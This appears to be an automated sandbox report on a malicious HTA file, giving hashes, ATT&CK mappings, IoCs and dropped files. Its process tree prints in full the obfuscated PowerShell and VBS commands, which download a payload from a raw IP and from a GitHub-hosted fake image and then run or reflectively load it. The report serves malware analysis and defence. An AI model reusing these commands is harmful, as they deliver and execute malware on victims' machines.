c6e6ef4d2a7c8dc43e114496de98a777e783cd554aa258736ef126ff8628d8c2

Analysis

max time kernel
122s
max time network
126s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
17-10-2024 14:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

verynicegirlneedsuperkiisingfromtheboy.hta
Size

130KB
MD5

bfa06f35d87c1939017d70c204d3a7d5
SHA1

bb80945300d62122564399f088f09d1760172c20
SHA256

c6e6ef4d2a7c8dc43e114496de98a777e783cd554aa258736ef126ff8628d8c2
SHA512

04465026afe312e8fa1420d8341f57c2742c2ee4ccc57f65659b77d31cc6cfa084787f587114fa05b75d8b0fcee87d55d67e162fb75f3ec92c0e9f5c4a06b0fa
SSDEEP

96:Eam7SVApoWIApM8RM9vZnQ8vFYDJuPPxfiApohP7T:Ea2SVAqzAelZFYF3AEDT

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

exe.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	2372	PoWershELl.exE
6	1556	powershell.exe
7	1556	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
628	powershell.exe
1556	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2372	PoWershELl.exE
2752	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
7	raw.githubusercontent.com
5	raw.githubusercontent.com
6	raw.githubusercontent.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PoWershELl.exE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2372	PoWershELl.exE
2752	powershell.exe
2372	PoWershELl.exE
2372	PoWershELl.exE
628	powershell.exe
1556	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2372	PoWershELl.exE
Token: SeDebugPrivilege	2752	powershell.exe
Token: SeDebugPrivilege	628	powershell.exe
Token: SeDebugPrivilege	1556	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2644 wrote to memory of 2372	2644	mshta.exe	30
PID 2644 wrote to memory of 2372	2644	mshta.exe	30
PID 2644 wrote to memory of 2372	2644	mshta.exe	30
PID 2644 wrote to memory of 2372	2644	mshta.exe	30
PID 2372 wrote to memory of 2752	2372	PoWershELl.exE	32
PID 2372 wrote to memory of 2752	2372	PoWershELl.exE	32
PID 2372 wrote to memory of 2752	2372	PoWershELl.exE	32
PID 2372 wrote to memory of 2752	2372	PoWershELl.exE	32
PID 2372 wrote to memory of 2392	2372	PoWershELl.exE	33
PID 2372 wrote to memory of 2392	2372	PoWershELl.exE	33
PID 2372 wrote to memory of 2392	2372	PoWershELl.exE	33
PID 2372 wrote to memory of 2392	2372	PoWershELl.exE	33
PID 2392 wrote to memory of 2848	2392	csc.exe	34
PID 2392 wrote to memory of 2848	2392	csc.exe	34
PID 2392 wrote to memory of 2848	2392	csc.exe	34
PID 2392 wrote to memory of 2848	2392	csc.exe	34
PID 2372 wrote to memory of 1640	2372	PoWershELl.exE	36
PID 2372 wrote to memory of 1640	2372	PoWershELl.exE	36
PID 2372 wrote to memory of 1640	2372	PoWershELl.exE	36
PID 2372 wrote to memory of 1640	2372	PoWershELl.exE	36
PID 1640 wrote to memory of 628	1640	WScript.exe	37
PID 1640 wrote to memory of 628	1640	WScript.exe	37
PID 1640 wrote to memory of 628	1640	WScript.exe	37
PID 1640 wrote to memory of 628	1640	WScript.exe	37
PID 628 wrote to memory of 1556	628	powershell.exe	39
PID 628 wrote to memory of 1556	628	powershell.exe	39
PID 628 wrote to memory of 1556	628	powershell.exe	39
PID 628 wrote to memory of 1556	628	powershell.exe	39

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\verynicegirlneedsuperkiisingfromtheboy.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2644
- C:\Windows\SysWOW64\WINDOwsPowERshElL\V1.0\PoWershELl.exE
  "C:\Windows\SYStEM32\WINDOwsPowERshElL\V1.0\PoWershELl.exE" "PoweRShell -eX ByPAsS -NoP -w 1 -C DeVIcecrEdEntiAldepLoYMent.eXe ; ieX($(iEX('[sySTeM.texT.encODIng]'+[cHAr]0x3a+[cHAR]58+'Utf8.GeTstRING([SystEm.CONVERT]'+[CHaR]58+[chAr]0x3A+'fROMBase64STRInG('+[ChaR]0x22+'JHJWalU4b2hIMmVuICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFcmRFZkluaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTWJUbE9NRkksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV2hDLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdNSSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhLbyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJzdWN3aUZLTkQiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGSmZiakxZUlcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRyVmpVOG9oSDJlbjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC40MC85OTA5L25pY2VwaWN0dXJld2l0aGhlcmxpcHNvbnRoZWxpcHN0aWN3aXRoaGVyLnRpRiIsIiRlTnY6QVBQREFUQVxuaWNlcGljdHVyZXdpdGhoZXJsaXBzb250aGVsaXBzdGljd2l0aGhlci52YlMiLDAsMCk7U1RBUnQtU0xlRVAoMyk7U1RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcbmljZXBpY3R1cmV3aXRoaGVybGlwc29udGhlbGlwc3RpY3dpdGhoZXIudmJTIg=='+[cHar]0x22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2372
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPAsS -NoP -w 1 -C DeVIcecrEdEntiAldepLoYMent.eXe
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2752
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\6aztvy7c.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2392
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES82C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC82B.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2848
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicepicturewithherlipsonthelipsticwithher.vbS"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1640
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aW52b2tlLWV4cHJlU1NJb24oKCgnezF9aW1hZ2VVcmwgPSB7MH1odHRwczovL3Jhdy5naXRodWJ1c2VyY29udGUnKydudC5jb20vQ3J5cHQnKydlcnNBbmRUb29sc09maWNpYWwvWklQL3JlZnMvaGVhZHMvbWFpbi9EZXRhaE5vdGVfVi5qcGcnKycgezB9JysnO3sxfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk4nKydldCcrJy5XZWJDbGllbnQ7ezF9aW1hZ2VCeXRlcyA9IHsxfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezF9aW1hZ2VVcmwpO3sxfWltYWdlVGV4dCA9IFtTeXN0ZW0uJysnVGV4dC5FbmNvZGknKyduZ106OlVURicrJzguR2V0UycrJ3RyaW5nKHsxfWltYWdlQnl0ZXMpO3sxfXN0YXJ0RmxhZyA9IHsnKycwJysnfTw8QkFTRTY0X1NUQVJUPj57MH07ezEnKyd9ZW5kRmxhZyA9IHswfTw8QkFTRTY0X0VORD4+ezB9O3sxJysnfXN0YXJ0SW5kZXggPSB7MX1pbWFnZVRleHQuSW5kZXhPZih7MScrJ31zdGFydEZsYWcpO3sxfScrJ2VuZEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9ZW5kRmxhZyk7ezF9c3RhcnRJbmRleCAtZ2UgMCAtYW5kIHsxfWVuZEluZGV4IC1ndCB7MX1zdGFydEluZGV4O3sxfXN0YXJ0SW5kZXggKz0gezF9c3RhcnRGbGFnLkxlbmd0aDt7MX1iYXNlNjRMZW5ndGggPSB7MX1lbmRJbmRleCAtIHsxfXN0YXJ0SW5kJysnZXg7ezF9YmFzZTY0Q29tbWFuZCA9IHsxfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezF9c3RhcnRJbmRleCwgezF9YmFzZTY0JysnTGVuZ3RoKTt7MX1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTYnKyc0U3RyaW5nJysnKHsxfWJhc2U2JysnNENvbW1hbicrJ2QpO3sxfWxvYWRlZEFzc2VtYmx5ID0gW1MnKyd5c3RlbScrJy5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh7MX1jb21tYW5kQnl0ZXMpO3sxfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoezB9VkFJezB9KTt7MX12YWlNZXRob2QuSW52b2tlKHsxfW51bCcrJ2wsIEAoezB9dHh0LkZDQ0VSUi85MDk5LzA0JysnLjAyMi4zLjI5MS8vOnB0dGh7MH0sIHswfWRlc2F0aXZhJysnZG97MH0sIHswfWQnKydlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3swfSwgezB9ZCcrJ2VzYXRpdmFkb3swfSkpOycpLUZbY2hBUl0zOSxbY2hBUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:628
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "invoke-expreSSIon((('{1}imageUrl = {0}https://raw.githubuserconte'+'nt.com/Crypt'+'ersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg'+' {0}'+';{1}webClient = New-Object System.N'+'et'+'.WebClient;{1}imageBytes = {1}webClient.DownloadData({1}imageUrl);{1}imageText = [System.'+'Text.Encodi'+'ng]::UTF'+'8.GetS'+'tring({1}imageBytes);{1}startFlag = {'+'0'+'}<<BASE64_START>>{0};{1'+'}endFlag = {0}<<BASE64_END>>{0};{1'+'}startIndex = {1}imageText.IndexOf({1'+'}startFlag);{1}'+'endIndex = {1}imageText.IndexOf({1}endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startInd'+'ex;{1}base64Command = {1}im'+'ageText.Substring({1}startIndex, {1}base64'+'Length);{1}commandBytes = [System.Convert]::FromBase6'+'4String'+'({1}base6'+'4Comman'+'d);{1}loadedAssembly = [S'+'ystem'+'.Refl'+'ection.Assembly]::Load({1}commandBytes);{1}vaiMethod = [dnlib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}nul'+'l, @({0}txt.FCCERR/9099/04'+'.022.3.291//:ptth{0}, {0}desativa'+'do{0}, {0}d'+'esativado{0}, {0}desativado{0}, {0}RegAsm{0}, {0}desativado{0}, {0}d'+'esativado{0}));')-F[chAR]39,[chAR]36) )"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1556

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6aztvy7c.dll

Filesize
3KB

MD5
ed3d4a68c2880b801eb1f1e884897180

SHA1
f364c4a21533eb12d81fb4e37100b1d8c98a594a

SHA256
cbbd05a82d1a9fece8403dff7f5b00647200196f6882e6dd000b2de0ad0aaa4c

SHA512
7eed666dd40c0ad28114f180d8ae670f1aa2c52722f7b89c633e85263c0d5bc0b2196c02ad2b39d50df193e4f22d1669b84357a22fc7a12e65e99946085e3933

Download Submit
C:\Users\Admin\AppData\Local\Temp\6aztvy7c.pdb

Filesize
7KB

MD5
cb8dd874cbf298f916b89e62d2a04eb0

SHA1
2ebf6a34a929228a797035f674690c8bd130d1f4

SHA256
b795f3a9ad5f94dc67dbb64217b6b3ac3a04692af5e11493369fbbf1084eaa73

SHA512
2a171c34e9e46a852abaf6fb6c5cdd2663416c70750dfd5033fc5eaa2ba909e9e3a39a4ab612f0c12920292e11f52d6042bd79ae300baadcb4e2c75fa66ecf46

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES82C.tmp

Filesize
1KB

MD5
3b88d0efb5f1f1ec24e26aa93d427063

SHA1
f2bfdd9925389fd1cdf921d78c97cc65304cadba

SHA256
96aa27631f8db618c30e31bd6e64e7d71ad63dc82aa04ec702db11eff82f6139

SHA512
7f8e1ed81c8300d138b56b2ec43da7d782357857ef60804bd75e5082c0a0a71af9a66a607a3663f9756176487d1caeba81c3c898da195373635376792b2acb53

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
c281528f795ac530298023312df30010

SHA1
e9f6eee5f493998262a90e1f657c459eae741c79

SHA256
89a19714ed4461ca1e9bb4e053c9fbb2ca7933f1ccf541684f49f946147605c1

SHA512
bc8b72aa02f7e352414e15ff75d6b9ddb34e2bcc4d334c93285f9eae610c968e341de9e0ef9b5ef6ab737d68635d8447232be07a2b7954a8864962dd5424e522

Download Submit
C:\Users\Admin\AppData\Roaming\nicepicturewithherlipsonthelipsticwithher.vbS

Filesize
190KB

MD5
2a9ee6d8ccd6eb9798a180e0e92c889c

SHA1
7871c7bfb07c278debbe50d3eff2b372918973e0

SHA256
56ba91564c0cdf1671dc0ebcd1c1323553627cd5f5e7622a1b66823e5e950650

SHA512
e5ada7fe9381706a7890d48a4b564e766030cca0e109c77a74e54354c390fe2d3981574a8ebed2d7e800148ba6cd245af4c11a4a0c105f56d6e19cdb89905e71

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\6aztvy7c.0.cs

Filesize
463B

MD5
ef1a52e62eb8136f57673b29cba789f5

SHA1
5d35e639e96c2d15d383b03ec1cbe89efd8ee75e

SHA256
dcf176d49fc46c4c6441a96381c4e85cd8af1b43a1468e05872538ed8c1f3584

SHA512
ad531d19065b816a6aa92a235ad89162bc68c256cce64859c1ba75ef72c4bd5343377fee478d019b2010d7defec7921aa96f84c0a75a1d66737de0735e9f0139

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\6aztvy7c.cmdline

Filesize
309B

MD5
b61cf18b8d9a1c310d90926d77180b72

SHA1
b9e058d355e44f23f05d185fcb9bf7e9b87f3757

SHA256
12056da32660ba25be2edebf1fd72cc2ee123be8939352824e079f57945035ad

SHA512
5c787dc5d673949e56b24e71f6d6fd0c309e82298cbef8761d5b7717524282c44753f341480f94e62e9a36f2d48dc5be366705e9d68a825828ee155b982fd114

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC82B.tmp

Filesize
652B

MD5
8c8c6489bfaa44a75722fbbad2aea2e9

SHA1
38da42a70e7e2da7f32f0af231d88f01d44acbc4

SHA256
7d37ac35751ba78e9b0ac09b96c6e3e8c357cf718ea4f3877d9b04c39d35c9d1

SHA512
2bf926d569ee08e1e66b63f234a46fcd256c03a87a3380a8b6cf90f6935214a363deb0a71cbcdf1542f090294db0f506b6ef01938177f00799c7cf67cf98518f

Download Submit